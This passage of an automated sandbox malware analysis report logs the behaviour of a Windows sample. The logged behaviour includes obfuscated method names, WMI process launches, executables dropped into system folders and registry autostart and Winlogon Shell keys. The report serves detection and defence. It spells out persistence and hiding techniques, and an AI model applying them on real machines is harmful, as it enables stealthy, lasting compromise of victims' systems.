                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, upNa45QCvs48jrqMkqX.csHigh entropy of concatenated method names: 'G5W2Fg5FJB', 'e512BKfglK', 'Yd7', 'bZm2WcQMGb', 'kQ52ohI2l8', 'osv2b80Lag', 'qCj2htpcS3', 'nJUtGZBxbnVUVWLNaiLH', 'rw5PY0BxW1Uc4iINdXm4', 'EoICrnBxoC4a0h107UHO'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, doxEQiEB5gR2aIxorCJ.csHigh entropy of concatenated method names: 'PQLEo9h1Xn', 'aG4EbrOgY7', 'WYfEhWH2m0', 'RMIYXeBHNjiuXw51jKsk', 'qxqiwyBHYgUZFQSgKQyj', 'WEx5WWBHrQQ4lEEeZqcO', 'a01AF2BHLvDX6Yuci8gO', 'WC0HSEBHUKsRlkVZxUVx', 'rHiAS9BHiUTvweCHpYtn'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, Yuhnvpn2QhnxP4kSHU4.csHigh entropy of concatenated method names: 'rtBnHttrJP', 'UOGn17WDT2', 'Pykn6jKrUY', 'tQHnRaHiv4', 'Mpvn9Rjj4L', 'QshnnBZI1h', 'V50ndY8cEB', 'KABnTqfeTU', 'tT9n5IRT94', 'eANnwYxDAy'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, Uuq7DtemIloFIxNDh00.csHigh entropy of concatenated method names: 'fuue3GotfP', 'Wc33qiB6ibqWULW1vLKt', 'h93aHnB6L7SWmAgt3bKj', 'H8P8QYB6UKbcuQSUNld3', 'yu7GLVB6MNbp61r2iuc7', 'P9X', 'vmethod_0', 'oR8Bbt0eVdt', 'imethod_0', 'tMqCEhB6vvDEN1arN5tJ'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, E8R0v1SUlCEpt5FBll3.csHigh entropy of concatenated method names: 'a7KIKpBw8eyqZsLogDaU', 'FRs1NeBwK7n9ROipX60Y', 'HKZ37jBwtlhMv4w7KSaP', 'BS4ycJBw4l5bTB5QhKI9', 'LYPbpWBwcJACfoZMPTcn', 'method_0', 'method_1', 'kGrSMAbUdQ', 'oMjSl5VVqO', 'JJZSf3ZH8P'
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, UOKYr93Y4GeCUG8PEXE.csHigh entropy of concatenated method names: 'ere3UNiNwm', 'qFo3fGbAHj', 'PhJ3DUQZPH', 'JSk372wl8q', 'tK6347rEiL', 'k5h3cVa46e', 'Hw038PwGBH', 'A3J3Khqj1X', 'Dispose', 'wPPq76BqUrB75EhoOXiQ'

                                    Persistence and Installation Behavior

                                    barindex
                                    Creates processes via WMI
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperContaineragent\Bridgecommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Drops executable to a common third party application directory
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile written: C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exeJump to behavior
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeJump to dropped file
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\ProgramData\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeFile created: C:\Users\user\Desktop\izhrsOEp.logJump to dropped file
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeFile created: C:\hyperContaineragent\Bridgecommon.exeJump to dropped file
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeJump to dropped file
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exeJump to dropped file
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeFile created: C:\Users\user\Desktop\WWLLRmVS.logJump to dropped file
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\Users\user\Desktop\tYJQSSrA.logJump to dropped file
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\Users\user\Desktop\EEEoXuLc.logJump to dropped file
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\ProgramData\nFQRHbQjcuhfqIAubZpdQD.exeJump to dropped file
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\ProgramData\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exeJump to dropped file
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\ProgramData\nFQRHbQjcuhfqIAubZpdQD.exeJump to dropped file
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\Users\user\Desktop\tYJQSSrA.logJump to dropped file
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\Users\user\Desktop\EEEoXuLc.logJump to dropped file
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeFile created: C:\Users\user\Desktop\WWLLRmVS.logJump to dropped file
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeFile created: C:\Users\user\Desktop\izhrsOEp.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Creates an undocumented autostart registry key
                                    Source: C:\hyperContaineragent\Bridgecommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Creates multiple autostart registry keys
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BridgecommonJump to behavior
                                    Drops PE files to the user root directory
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile created: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeJump to dropped file
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BridgecommonJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BridgecommonJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BridgecommonJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BridgecommonJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQDJump to behavior

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Loading BitLocker PowerShell Module
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
